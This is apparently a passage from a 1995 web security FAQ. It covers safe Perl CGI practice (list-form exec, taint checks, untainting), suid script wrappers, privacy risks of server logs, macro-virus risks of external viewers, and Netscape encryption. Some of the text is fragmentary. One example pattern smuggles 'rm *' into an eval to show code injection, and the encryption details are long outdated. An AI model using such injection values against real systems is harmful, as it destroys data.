All of these constructions can be risky if they involve user input that may contain shell metacharacters. For system() and exec(), there's a somewhat obscure syntactical feature that allows you to call external programs directly rather than going through a shell. If you pass the arguments to the external program, not in one long string, but as separate members in a list, then Perl will not go through the shell and shell metacharacters will have no unwanted side effects. For example:
system "/usr/bin/sort","foo.in";

You can take advantage of this feature to open up a pipe without going through a shell. By calling open on the magic character sequence
|-, you fork a copy of Perl and open a pipe to the copy. The child
copy then immediately exec's another program using the argument list
variant of exec().
open (SORT,"|-") || exec "/usr/bin/sort",$uservariable;
foreach $line (@lines) {
print SORT $line,"\n";
}
close SORT;
To read from a pipe without opening up a shell, you can do something
similar with the sequence -|:
open(GREP,"-|") || exec "/usr/bin/grep",$userpattern,$filename;
while (<GREP>) {
print "match: $_";
}
close GREP;
These are the forms of open() you should use whenever you would otherwise
perform a piped open to a command.
An even more obscure feature allows you to call an external program and lie to it about its name. This is useful for calling programs that behave differently depending on the name by which they were invoked.
The syntax is
system $real_name "fake_name","argument1","argument2";

For example:
$shell = "/bin/sh";
system $shell "-sh","-norc";

This invokes the shell using the name "-sh", forcing it to behave interactively. Note that the real name of the program must be stored in a variable, and that there's no comma between the variable holding the real name and the start of the argument list.
There's also a more compact syntax for this construction:
system { "/bin/sh" } "-sh","-norc"
You turn on taint checks in version 4 of Perl by using a special version of the interpreter named "taintperl":
#!/usr/local/bin/taintperl

In version 5 of Perl, pass the -T flag to the interpreter:

#!/usr/local/bin/perl -T

See below for how to "untaint" a variable.
$ENV{'PATH'} = '/bin:/usr/bin:/usr/local/bin';
Adjust this as necessary for the list of directories you want
searched. It's not a good idea to include the current directory
(".") in the path.
$mail_address=~/([\w.-]+\@[\w.-]+)/;
$untainted_address = $1;
$foo=~/$user_variable/ is unsafe?
foreach (@files) {
m/$user_pattern/o;
}
Now, however, Perl will ignore any changes you make to the user
variable, making this sort of loop fail:
foreach $user_pattern (@user_patterns) {
foreach (@files) {
print if m/$user_pattern/o;
}
}
To get around this problem Perl programmers often use this sort of
trick:
foreach $user_pattern (@user_patterns) {
eval "foreach (\@files) { print if m/$user_pattern/o; }";
}
The problem here is that the eval() statement involves a user-supplied
variable. Unless this variable is checked carefully, the eval()
statement can be tricked into executing arbitrary Perl code. (For an
example of what can happen, consider what the eval statement does if
the user passes in this pattern: "/; system 'rm *'; /".)
The taint checks described above will catch this potential problem. Your alternatives include using the unoptimized form of the pattern matching operation, or carefully untainting user-supplied patterns. In Perl5, a useful trick is to use the escape sequence \Q \E to quote metacharacters so that they won't be interpreted:
print if m/\Q$user_pattern\E/o;
You can make a script run with the privileges of its owner by setting its "s" bit:
chmod u+s foo.pl

You can make it run with the privileges of its owner's group by setting the s bit in the group field:

chmod g+s foo.pl

However, many Unix systems contain a hole that allows suid scripts to be subverted. This hole affects only scripts, not compiled programs. On such systems, an attempt to execute a Perl script with the suid bits set will result in a nasty error message from Perl itself.
You have two options on such systems:
ftp://rtfm.mit.edu/pub/usenet-by-group/comp.lang.perl/
#include <unistd.h>

int main () {
   execl("/usr/local/bin/perl","foo.pl","/local/web/cgi-bin/foo.pl",(char*)NULL);
   return 1;   /* reached only if the exec fails */
}
After compiling this program, make it suid. It will run under its
owner's permission, launching a Perl interpreter and executing the
statements in the file "foo.pl".
Another option is to run the server itself as a user that has sufficient privileges to do whatever the scripts need to do. If you're using the CERN server, you can even run as a different user for each script. See the CERN documentation for details.
(Thanks to Bob Bagwill who contributed many of the Q&A's in this section)
Most servers log every access. The log usually includes the IP address and/or host name, the time of the download, the user's name (if known by user authentication or obtained by the identd protocol), the URL requested (including the values of any variables from a form submitted using the GET method), the status of the request, and the size of the data transmitted. Some browsers also tell the server what client software the reader is using, the URL the reader came from, and the user's e-mail address. Servers can log this information as well, or make it available to CGI scripts. Most WWW clients are probably run from single-user machines, so a download can usually be attributed to an individual. Revealing any of these items could be potentially damaging to a reader.
For example, XYZ.com downloading financial reports on ABC.com could signal a corporate takeover. Accesses to an internal job posting reveal who might be interested in changing jobs. The time a cartoon was downloaded could reveal that a reader is misusing company resources. A referral log entry might contain something like:
file://prez.xyz.com/hotlists/stocks2sellshort.html -> http://www.xyz.com/
The pattern of accesses made by an individual can reveal how they intend to use the information. And the input to searches can be particularly revealing.
Another way Web usage can be revealed locally is via browser history, hotlists, and cache. If someone has access to the reader's machine, they can check the contents of those databases. An obvious example is shared machines in an open lab or public library.
Proxy servers used for access to Web services outside an organization's firewall are in a particularly sensitive position. A proxy server will log every access to the outside Web made by every member of the organization and track both the IP number of the host making the request and the requested URL. A carelessly managed proxy server can therefore represent a significant invasion of privacy.
If you are a government site, you may be required by law to protect the privacy of your readers. For example, U.S. Federal agencies are not allowed to collect or publish many types of data about their clients.
In most U.S. states, it is illegal for libraries and video stores to sell or otherwise distribute records of the materials that patrons have checked out. While the courts have yet to apply the same legal standard to electronic information services, it is not unreasonable for users to have the same expectation of privacy on the Web. In other countries, for example Germany, the law explicitly forbids the disclosure of online access lists. If your site chooses to use its Web logs to populate mailing lists or to resell them to other businesses, make sure you clearly advertise that fact.
The easiest way to avoid collecting too much information is to use a server that allows you to tailor the output logs, so that you can throw away everything but the essentials. Another way is to regularly summarize and discard the raw logs. Since the logs of popular sites tend to grow quickly, you probably will need to do that anyway.
You can protect outsiders by summarizing your logs. You can help protect insiders by:
If your site does not want to reveal certain Web accesses from your site's domain, you may need to get Web client accounts from another Internet provider that can provide anonymous access.
These words of warning apply also to the macro worksheets generated by popular PC spreadsheet programs. Although it seems natural to declare a type "application/x-msexcel-macro" in order to receive spreadsheets that automatically recalculate themselves, some of the functions in the Excel macro language have the potential to inflict damage on other worksheets and files. These warnings even apply to such seemingly innocuous things as word processor style sheets and template files! Many high end word processors have a built-in macro processing ability. An example of the way in which word processing macros can be misused is the Microsoft Word "prank macro", which has the ability to spread, virus-like, from document to document.
In short, beware of declaring an external viewer for any file that contains executable statements.
This security problem is addressed by scripting languages such as Java and Safe Tcl, in which dangerous functions can be disabled. There's even a prototype "Safe Perl" that can be used as a safer external viewer for Perl programs.
To turn this warning off, select Preferences from Netscape's Options menu, choose "Images and Security", and uncheck the checkbox labeled "Warn before submitting forms insecurely."
Netscape servers and browsers do encryption using either a 40-bit secret key or a 128-bit secret key. Many people feel that using a 40-bit key is insecure because it's vulnerable to a "brute force" attack (trying each of the 2^40 possible keys until you find the one that decrypts the message). Using a 128-bit key eliminates this problem because there are 2^128 instead of 2^40 possible keys. Unfortunately, most Netscape users have browsers that support only 40-bit secret keys. This is because of legal restrictions on the encryption software that can be exported from the United States (the Federal Government has recently modified this policy following the well-publicized cracking of a Netscape message encrypted using a 40-bit key; expect this situation to change).
In Netscape you can tell what kind of encryption is in use for a particular document by looking at the "document information" screen accessible from the File menu. The little key in the lower left-hand corner of the Netscape window also indicates this information. A solid key with two teeth means 128-bit encryption, a solid key with one tooth means 40-bit encryption, and a broken key means no encryption. Even if your browser supports 128-bit encryption, it may use 40-bit encryption when talking to older Netscape servers or Netscape servers outside the U.S. and Canada.
The contents of queries in forms submitted using the GET request appear in the server log files because the query is submitted as part of the URL. However, when a query is submitted as a POST request (which is often the case when submitting a fill-out form), the data you submit doesn't get logged. If you are concerned about the contents of a keyword search appearing in a public log somewhere, check whether the search script uses the GET or POST method. The easiest technique is to try an innocuous query first. If the contents of the query appear in the URL of the retrieved document, then they probably appear in the remote server's logs too.
Server/browser combinations that use data encryption, such as Netsite/Netscape, encrypt the URL request. Furthermore the encrypted request, because it is submitted as a POST request, does not appear in the server logs.
Last Modified September 9, 1995